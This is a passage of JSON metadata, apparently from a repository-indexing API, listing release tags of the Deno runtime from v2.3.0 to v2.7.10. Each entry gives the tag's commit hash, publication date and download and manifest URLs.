.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url